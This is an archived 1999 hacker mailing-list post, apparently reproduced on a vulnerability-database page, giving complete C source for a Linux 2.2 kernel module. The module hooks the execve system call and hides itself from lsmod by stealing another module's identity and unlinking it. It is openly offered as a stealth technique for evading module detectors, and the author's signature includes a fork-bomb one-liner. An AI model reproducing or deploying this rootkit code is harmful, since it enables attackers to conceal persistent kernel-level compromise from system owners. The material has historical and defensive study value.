Vulners
Lucene search
kernel_hide.txt
`Subject: [EuroHaCk] stealth-code (fwd)
To: [email protected]
---------- Forwarded message ----------
Date: Wed, 18 Aug 1999 18:56:09 +0200
From: Martin Markovitz <[email protected]>
Reply-To: [email protected]
To: [email protected]
Subject: [EuroHaCk] stealth-code
hi,
don't think that hiding modules is an old topic. ;-)
since all the other dirty tricks didn't work on 2.2
kernel (as using asm-code etc.) i used new
techniqe to hide modules. example-code below.
payload is simly print-out-message-at-execution-call
thingie.
this module even is stealth enuff ;-) for my radar.c
module-detector.
any other suggestions are welcome.
cheers,
Stealth
: ---- main(){fork();main();} ----
: Hi! I'm a .signature virus! Copy me into your ~/.signature, please!
: Stealth <-> http://www.kalug.lug.net/stealth
/*** A kernel-module for 2.2 kernels, hiding itself.
*** It was easier in 2.0 kernels and i found all the old
*** techniqes not to work. So i invented new one. ;-)
*** (C) 1999/2000 by Stealth.
*** All under the GPL. SO YOU USE IT AT YOUR OWN RISK.
*** http://www.kalug.lug.net/stealth
***
*** Greets to all my friends, you know who you are.
***/
#define __KERNEL__
#define MODULE
#include <linux/module.h>
#include <linux/kernel.h>
#include <sys/syscall.h>
#include <linux/unistd.h>
#include <linux/sched.h>
#include <asm/uaccess.h>
#include <linux/mm.h>
#include <linux/smp_lock.h>
#ifndef NULL
#define NULL ((void*)0)
#endif
extern void *sys_call_table[];
int (*old_exec)(struct pt_regs regs);
int new_exec(struct pt_regs regs)
{
int error = 0;
char *filename;
lock_kernel();
filename = getname((char*)regs.ebx);
error = PTR_ERR(filename);
if (IS_ERR(error))
goto out;
printk("Hi, the hook is still installed. ;-)\n");
error = do_execve(filename, (char**)regs.ecx, (char**)regs.edx, ®s);
putname(filename);
out:
unlock_kernel();
return error;
}
int init_module()
{
int i = 0;
struct module *m = &__this_module, *lastm = NULL,
*to_delete = NULL;
EXPORT_NO_SYMBOLS;
/* install hook */
old_exec = sys_call_table[__NR_execve];
sys_call_table[__NR_execve] = new_exec;
/* get next module-struct */
to_delete = m->next;
if (!to_delete) {
printk("No module found for exchange }|-(\n");
return 0;
}
/* and steal all information about it */
m->name = to_delete->name;
m->size = to_delete->size;
m->flags = to_delete->flags;
/* even set the right USE_COUNT */
for (i = 0; i < GET_USE_COUNT(to_delete); i++)
MOD_INC_USE_COUNT;
/* and drop the attacked module from the list
* this won't delete it but makes it disapear for lsmod
*/
m->next = to_delete->next;
printk("The following modules are visible now:\n");
while (m) {
printk("%s\n", m->name);
m = m->next;
}
printk("Tzzz... (sleeping)\n");
return 0;
}
int cleanup_module()
{
sys_call_table[__NR_execve] = old_exec;
return 0;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Sep 1999 00:00Current
7.4High risk
Vulners AI Score7.4